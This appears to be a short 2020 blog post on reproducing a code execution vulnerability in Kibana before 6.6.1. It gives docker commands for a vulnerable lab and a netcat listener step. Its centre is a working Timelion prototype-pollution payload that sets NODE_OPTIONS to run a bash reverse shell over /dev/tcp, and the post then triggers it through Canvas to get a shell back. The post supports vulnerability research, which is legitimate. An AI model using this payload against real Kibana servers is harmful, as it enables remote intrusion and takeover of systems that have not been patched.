notes on code execution vulnerability recurrence of kibana < 6.6.1

Posted by fierce at 2020-02-27

Kibana is an open source analysis and visualization platform that is often used to work with elastic search. Use kibana to search, view, and interact with data stored in the elastic search index.

You can create bar, line, scatter, or pie charts and maps on top of a large amount of data

Kibana also provides a presentation tool called canvas, which allows users to create a slide platform and extract real-time data directly from elastic search.


.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/ 0>&1");process.exit() .props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')

0x01 environment preparation:

docker pull kibana:6.5.4

docker pull elasticsearch:6.5.4

docker network create somenetwork

docker run -d --name kibana --net somenetwork -p 5601:5601 kibana:6.5.4

docker run -d --name elasticsearch --net somenetwork -p 9200:9200 -p 9300:9300 -e "discovery.type=single-node" elasticsearch:6.5.4

0x02 reproduction process:

1. Log in to VPS and listen to the port

        nc -l 443

    2. Timelion

Access the timelion module, paste POC and click the execute button


    3. Canvas

Click the canvas module to trigger the vulnerability and successfully rebound the shell